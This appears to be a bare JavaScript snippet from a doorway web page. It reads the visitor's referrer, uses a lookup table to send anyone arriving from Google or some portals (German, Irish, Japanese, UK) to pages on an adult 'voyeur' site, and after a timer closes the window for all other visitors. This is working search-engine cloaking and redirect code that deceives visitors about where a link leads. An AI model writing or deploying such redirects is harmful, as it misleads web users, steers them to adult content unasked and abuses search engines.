function Weiter() {
var x = meme();
 if(x == false) top.close();
}
window.setTimeout("Weiter()",1900);

function meme() {
var refarray = new Array();
refarray['google.co.nz'] = "http://www.voyeurland.ch/spanner-index_e.html";
refarray['google.ie'] = "http://www.voyeurland.ch/spanner-index_e.html";
refarray['co.jp'] = "http://www.voyeurland.ch/spanner-index_e.html";
refarray['t-online.de'] = "http://www.voyeurland.ch/spanner-index.html";
refarray['google.de'] = "http://www.voyeurland.ch/spanner-index.html";
refarray['google.ie'] = "http://www.voyeurland.ch/spanner-index_e.html";
refarray['uk.search'] = "http://www.voyeurland.ch/spanner-index_e.html";
for (var i in refarray) {
if (document.referrer.indexOf(i) != -1) document.location.replace(refarray[i]);
}
}
